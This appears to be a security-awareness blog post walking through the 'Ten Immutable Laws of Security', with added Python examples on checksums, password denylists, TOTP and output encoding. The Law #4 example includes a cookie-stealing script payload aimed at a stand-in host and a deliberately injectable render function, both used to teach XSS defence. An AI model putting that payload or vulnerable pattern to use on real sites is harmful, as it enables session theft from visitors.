Security 101: The Ten Immutable Laws of Security Revisited

Fifteen years…! Wow, how time flies. It was 15 years ago that Microsoft security researcher (now a Director at Microsoft) Scott Culp penned an article called “Ten Immutable Laws of Security.” That coincided with my blossoming interest in Information Security, which is why the fact that it was 15 years ago seems so shocking to me. Apparently, time really does fly when you’re having fun.

Culp’s Ten Laws have since been updated (version 2.0 is the current one), but the basic message is the same, and any IT professional looking to get into Information Security should not only know and understand these laws but internalize them as a way of working. Since this is a 101-level review of Information Security, I want to take a few moments to make sure you are aware of them and to discuss what they mean to you today. Microsoft’s own write-up is worth reading in full, but I am also going to reproduce the laws below with some additional guidance on each.

Law #1: If a bad guy can persuade you to run his program on your computer, it’s not solely your computer anymore.

Phishing scams, link bait, hacked software, hacks for software, keygens, screensavers, games, codecs, media files… the list goes on and on. Search online for almost anything you might wish to download and odds are extremely good that most of the links on the first page of results lead to something other than what you actually wanted. Check out torrent sites or any other source of binaries of questionable origin, and I guarantee you that most of those downloads are crawling with badness. Everyone wants something for nothing, and the bad guys are happy to use that to their advantage. Set aside the morality and the legality of downloading copyrighted content without paying for it… is it really worth the risk that your computer won’t be yours anymore?

Law #2: If a bad guy can alter the operating system on your computer, it’s not your computer anymore.

Consider how many “fixes” are “documented” online to correct this behavior or patch that bug. How many posts consist of “download this file from my site to fix that error,” and how many of those sites have nothing at all to do with the vendor of your operating system? This is NOT just a problem for Windows users, so don’t assume that every package repository can be trusted either. When you are considering patching, upgrading, or recompiling your operating system, whether it’s a binary or new source you want to compile from scratch, if you cannot read and understand the code yourself and it’s not coming from the maker directly, don’t trust it. If it is coming from the vendor, make sure the digital signature or the published checksum of the download checks out, or treat the file(s) as bad. One caveat: a checksum posted on the same page as the download only proves the file was not corrupted in transit. An attacker who can replace the file can usually replace the checksum next to it, so a signature you can verify against the vendor’s key is what actually proves where the file came from.
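Here is the checksum part of that advice as an added worked example (this is not code from the original post). It parses a checksum list in the two-column format that `sha256sum` produces, hashes each listed file, and fails closed: a mismatch or a missing file means the batch is rejected, not just reported. The file names, file contents and digests are constructed for the demonstration; the digests are the real SHA-256 values of the constructed contents.

```python
"""Verify downloaded files against a sha256sum-style checksum list.

Added example, not from the original post. CHECKSUMS, the file names and the
file contents are constructed; the digests are the genuine SHA-256 of the
constructed contents ("hello world" and "test").
"""
import hashlib
import hmac
import os
import tempfile

# Constructed checksum list in the format produced by `sha256sum`:
# "<hex digest>  <filename>"; a leading '*' on the name marks binary mode.
CHECKSUMS = """\
b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9  patch-1.0.tar.gz
9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08 *README.txt
"""

HEX_CHARS = set("0123456789abcdefABCDEF")


def parse_checksum_file(text):
    """Parse `sha256sum` output into {filename: hexdigest}; reject malformed lines."""
    expected = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: malformed entry {raw!r}")
        digest, name = parts
        name = name.lstrip("*")  # binary-mode marker, not part of the file name
        if len(digest) != 64 or not set(digest) <= HEX_CHARS:
            raise ValueError(f"line {lineno}: {digest!r} is not a SHA-256 hex digest")
        expected[name] = digest.lower()
    return expected


def sha256_of(path, chunk_size=1 << 16):
    """Hash a file in chunks so large downloads do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_downloads(directory, checksum_text):
    """Return {filename: 'OK' | 'FAILED' | 'MISSING'} for every listed file."""
    results = {}
    for name, digest in parse_checksum_file(checksum_text).items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "MISSING"
        elif hmac.compare_digest(sha256_of(path), digest):
            results[name] = "OK"
        else:
            results[name] = "FAILED"
    return results


def all_ok(results):
    """Fail closed: accept the batch only if every listed file is present and matches."""
    return bool(results) and all(status == "OK" for status in results.values())


def demo(scenario="ok"):
    """Write the constructed files into a temp dir and verify them.

    scenario: "ok" (files intact), "tampered" (one byte appended to README.txt),
    or "missing" (README.txt absent).
    """
    workdir = tempfile.mkdtemp()
    files = {"patch-1.0.tar.gz": b"hello world", "README.txt": b"test"}
    if scenario == "tampered":
        files["README.txt"] = b"test\n"  # a single extra byte: the digest no longer matches
    elif scenario == "missing":
        del files["README.txt"]
    for name, data in files.items():
        with open(os.path.join(workdir, name), "wb") as f:
            f.write(data)
    return verify_downloads(workdir, CHECKSUMS)


if __name__ == "__main__":
    for scenario in ("ok", "tampered", "missing"):
        results = demo(scenario)
        print(scenario, results, "-> accept" if all_ok(results) else "-> reject")
```

On a real download you would run `verify_downloads` against the directory you saved into and the checksum text you fetched; `all_ok` is the only question worth asking before you install anything. The comparison uses `hmac.compare_digest` out of habit rather than necessity here, since the digests are public, but it costs nothing and avoids having to think about it when the same helper is reused for secrets.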

Law #3: If a bad guy has unrestricted physical access to your computer, it’s not your computer anymore.

If they can touch it, they can own it. Any system a bad guy has direct physical access to is theirs to do with as they please. Full-disk encryption and a pre-boot password raise the bar for someone who walks off with a powered-down laptop, but a running, unlocked machine is simply theirs. Don’t leave your computer unlocked when you are away from it. Don’t leave it out in the open in a hotel room when you travel. Ensure your workplace provides adequate physical security for all systems. You know that PC the receptionist uses, sitting in the elevator lobby where anyone can walk up to it? Yeah, if your building is not locked down so that you need a badge to even get onto your floor, then that PC needs to be locked away at the end of every shift.

Law #4: If you allow a bad guy to run active content on your website, it’s not your website any more.

Limit what can and cannot be uploaded to your website or forums. Quarantine and scan any files that users upload. Regularly and frequently run security scans of your website and all of its content, and make sure that user-supplied input is validated on the way in and encoded for the context it lands in on the way out, so the site cannot be exploited by injection or cross-site scripting. One of the most common ways end users’ machines get infected is by visiting a trusted site that does not know it is hosting something bad.
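To make the cross-site scripting point concrete, here is an added example (not code from the original post) of the same forum post rendered two ways: interpolated verbatim, which hands the attacker’s script to every visitor’s browser, and HTML-encoded on output. It also shows why encoding alone is not enough in a URL context: a `javascript:` link survives `html.escape` untouched, so the scheme has to be allowlisted. The template and the hostile post are constructed for the demonstration.

```python
"""Rendering user-supplied forum content: injectable versus output-encoded.

Added example, not code from the original post. TEMPLATE and HOSTILE_POST are
constructed; render_vulnerable() is deliberately unsafe to show the problem.
"""
import html
import re
from urllib.parse import urlsplit

TEMPLATE = '<div class="post"><b>{author}</b>: {body} <a href="{link}">link</a></div>'

# Constructed post from a hostile user. The body steals the visitor's cookie;
# the link relies on the javascript: scheme instead of a <script> tag.
HOSTILE_POST = {
    "author": "guest",
    "body": '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    "link": "javascript:alert(document.cookie)",
}


def render_vulnerable(post):
    """Interpolates untrusted fields verbatim: the browser runs whatever was posted."""
    return TEMPLATE.format(**post)


def safe_href(url):
    """URL context: encoding does not neutralise 'javascript:', so allowlist the scheme.

    Returns an escaped absolute http(s) URL, or a harmless '#' for anything else
    (relative links are rejected too; a forum has no reason to accept them from users).
    """
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_escaped(post):
    """HTML-encode every untrusted field for the context it lands in."""
    return TEMPLATE.format(
        author=html.escape(post["author"], quote=True),
        body=html.escape(post["body"], quote=True),
        link=safe_href(post["link"]),
    )


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
JS_SCHEME = re.compile(r'href="\s*javascript:', re.IGNORECASE)


def contains_active_content(rendered_html):
    """Crude marker check, only to make the difference visible: a live <script>
    tag or a javascript: href in the rendered page."""
    return bool(SCRIPT_TAG.search(rendered_html) or JS_SCHEME.search(rendered_html))


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("escaped", render_escaped)):
        page = render(HOSTILE_POST)
        print(f"{label}: active content = {contains_active_content(page)}")
        print(" ", page)
```

In a real application the encoding belongs in the template engine (auto-escaping turned on), not in hand-written calls, but the rule it enforces is the one shown here: every byte that came from a user is data, and it is encoded for the exact context (element body, attribute, URL, script) before it goes back out.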

Law #5: Weak passwords trump strong security.

There is no variant of P@ssw0rd or p@$$word or Password1 or even b70w$$@q that hasn’t been used by enough people to land in the first 10,000 guesses of a brute force attack. And since even the underpowered processor in a discount tablet can run through 10,000 guesses in well under a hundredth of a second, you really want better. I’m going to let you in on a little secret. All passwords are weak. There is no such thing as a strong password, at least when you measure it against the strength of a dedicated adversary determined to crack it.
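Why do those “clever” variants count as the same password? Because cracking tools do not compare strings literally; they apply mangling rules (leet substitutions, capitalisation, appended digits and symbols) to a list of common base words. The added example below (not code from the original post) runs that idea in reverse as a denylist check: it normalises a candidate the way a rule set would and looks the result up in a tiny constructed stand-in for the top of a leaked-password list. Real lists run to millions of entries, so passing this check says very little; failing it says a great deal.

```python
"""Denylist check that sees through leet-speak and appended digits.

Added example, not code from the original post. TOP_PASSWORDS is a constructed,
tiny stand-in for the head of a leaked-password list; the LEET map covers the
most common substitutions a cracking rule set would apply.
"""
import re

# Constructed stand-in for the first entries of a leaked-password list.
TOP_PASSWORDS = {
    "password", "123456", "qwerty", "letmein", "welcome",
    "admin", "iloveyou", "football", "monkey", "dragon",
}

# Reverse of the substitutions attackers' mangling rules apply.
LEET = str.maketrans({
    "@": "a", "4": "a", "$": "s", "5": "s", "0": "o",
    "1": "i", "!": "i", "3": "e", "7": "t",
})

# Digits and symbols glued onto the end ("Password1", "welcome2024!") add nothing.
TRAILING_JUNK = re.compile(r"[\d!@#$%^&*.?_-]+$")


def normalize(password):
    """Reduce a candidate to the base word a rule-based cracker would start from."""
    base = password.lower()
    base = TRAILING_JUNK.sub("", base)
    return base.translate(LEET)


def matches_common_list(password, denylist=TOP_PASSWORDS):
    """Return the common base word the password reduces to, or None if it reduces
    to nothing on the list. None is 'not caught by this list', not 'strong'."""
    base = normalize(password)
    return base if base in denylist else None


def check_candidates(candidates, denylist=TOP_PASSWORDS):
    """Map each candidate to its matched base word (or None) for a batch report."""
    return {pw: matches_common_list(pw, denylist) for pw in candidates}


if __name__ == "__main__":
    # Constructed candidates, including the ones named in the post.
    report = check_candidates([
        "P@ssw0rd", "p@$$word", "Password1", "W3lc0me2024!",
        "L3tm31n", "b70w$$@q", "correct horse battery staple",
    ])
    for pw, hit in report.items():
        verdict = f"reduces to '{hit}' (common)" if hit else "not on this list"
        print(f"{pw:32} {verdict}")
```

Note that b70w$$@q sails through this particular list, which is exactly the author’s point: a denylist is a floor, not a ceiling. The realistic defence is a long, unique, randomly generated password per site held in a password manager, and a second factor so that a guessed or phished password is not enough on its own.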

The best thing you can do is use multifactor authentication, period. Whether you use a smart card, a hardware token, or an app on your mobile phone, even if someone does guess a user’s password (or tricks them into giving it away), it is of no use to them without that second factor. The one caveat: a code the user types in can also be phished in real time by a convincing fake login page, so factors that are bound to the legitimate site (a security key or platform authenticator) are stronger than one-time codes, and SMS codes are the weakest of the lot. Still, 2FA using a mobile device can be used from any system, and it doesn’t have the SciFi creep factor of biometrics, which you can go with if you have the budget for it!
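To show what the “app on your mobile phone” factor actually is, here is an added example (not code from the original post) of time-based one-time passwords as defined in RFC 4226 and RFC 6238: an HMAC over the current 30-second time step, truncated to six digits. The server side accepts one step of clock drift either way but refuses to accept a code at or before the last step it already accepted, which is the replay check a naive implementation forgets. The secret used in the demo is the RFC 6238 reference-vector secret, so the codes can be checked against the published values; nothing else here is from the original post.

```python
"""TOTP (RFC 6238) generation and server-side verification with replay protection.

Added example, not code from the original post. DEMO_SECRET is the ASCII seed
from the RFC 6238 test vectors ("12345678901234567890"); everything else is
constructed for the demonstration.
"""
import hashlib
import hmac
import struct
import time

DEMO_SECRET = b"12345678901234567890"


def hotp(secret, counter, digits=6, digestmod=hashlib.sha1):
    """RFC 4226 HOTP: HMAC over the 8-byte big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, timestamp, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with the counter set to the current time step."""
    return hotp(secret, int(timestamp) // step, digits)


def verify_totp(secret, submitted, timestamp, last_counter=-1, step=30, window=1, digits=6):
    """Server-side check. Returns the time-step counter the code matched, or None.

    Accepts the current step and `window` steps either side (clock drift), but
    never a counter at or below `last_counter`: a code that was already accepted,
    or one older than it, is dead even if it is still inside the drift window.
    """
    submitted = submitted.strip().replace(" ", "")
    if not submitted.isdigit() or len(submitted) != digits:
        return None
    now = int(timestamp) // step
    for counter in range(now - window, now + window + 1):
        if counter <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, counter, digits), submitted):
            return counter
    return None


class TotpAccount:
    """Minimal per-user state: the shared secret and the last accepted counter."""

    def __init__(self, secret):
        self.secret = secret
        self.last_counter = -1

    def login(self, code, timestamp):
        matched = verify_totp(self.secret, code, timestamp, self.last_counter)
        if matched is None:
            return False
        self.last_counter = matched  # burn this step so the same code cannot be replayed
        return True


if __name__ == "__main__":
    now = time.time()
    code = totp(DEMO_SECRET, now)
    account = TotpAccount(DEMO_SECRET)
    print("code for this step:", code)
    print("first use accepted:", account.login(code, now))
    print("replay accepted:   ", account.login(code, now + 5))
```

The shared secret is the whole game here: it is delivered once, out of band (the QR code you scan at enrolment), and after that nothing secret ever crosses the wire, only six digits that are worthless thirty seconds later. That is also why a code phished in real time is dangerous: it is valid for exactly the window this verifier allows.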

Law #6: A computer is only as secure as the administrator is trustworthy.

Reference checks, employment checks, credit checks, criminal record checks, background investigations… how far does your HR team take its responsibility for looking into new hires? You may not need a full-scope background investigation on the receptionist or the delivery driver, but IT sysadmins have access to everything on the network. They can read the CEO’s emails, pull the payroll history for anyone in the company, learn just what the secret recipe of the Colonel’s chicken is that makes you crave it fortnightly! Ensure that anyone with privileges to any system is fully checked out before hiring, and then back that trust up with the controls you would want anyway: give administrators only the rights their job needs, and log what they do with them.

Law #7: Encrypted data is only as secure as its decryption key.

Which means that if the key exchange is weak, or the key itself is, then your encryption is at risk. The only thing worse than an insecure key is a proprietary, unvetted algorithm. Stick with publicly reviewed, standard algorithms and protocols, and if you must use and exchange a pre-shared key, do so out of band from the data exchange. In other words, don’t email someone the password to decrypt the file you just emailed them! Call them, text them, send them smoke signals, anything but sending the password by the same channel you used for the data.

Law #8: An out-of-date antimalware scanner is only marginally better than no scanner at all.

I always go one further than this and say it’s worse. If I am on a machine that has no antimalware, I won’t download or install anything that I am not absolutely sure of. I’d say most others would feel the same way. But if antimalware is on the machine, I may not be as circumspect, opting instead to count on the antimalware to keep me safe. Of course, if it is out of date, it’s useless, but that won’t stop me from being stupid!

Law #9: Absolute anonymity isn’t practically achievable, online or offline.

Sure, you can live in a cave and bounce your signal off a neighbor’s insecure Wi-Fi, route it through Tor three times and an open web proxy, then through a Ukrainian satellite before you reach your goal… but wait, this isn’t a Hollywood spy thriller, so that isn’t practical or even realistic. There is always a log somewhere, and you should assume that anything you do online will stay online forever and eventually be seen by your grandmother. Don’t be stupid, don’t be rude, and don’t do something your meemaw would be ashamed of!

Law #10: Technology is not a panacea.

There is no firewall that cannot be bypassed. There is no hardening procedure that is bulletproof. Any encryption can in principle be brute-forced given enough CPU cycles; modern key sizes make that impractical, but weak keys, bad implementations, and careless key handling shorten the job dramatically. And there is no code written without vulnerabilities. Technology is not a panacea, and there is no single solution that can make you 100% guaranteed secure. Work on the human aspect, minimize the opportunities for attackers to find something to exploit, keep up to date on patching and malware definitions, and use a layered defense to do the best you can.

Learn them. Live them. Love them. Make them a part of who you are, and help instill in your users, your friends, and your family an awareness of the same. These ten laws are not just for sysadmins, they are for anyone using technology. But stay tuned! In our next post in this series, we are going to take a look at a related set of laws laid down by Culp – The 10 Immutable Laws of Security Administration.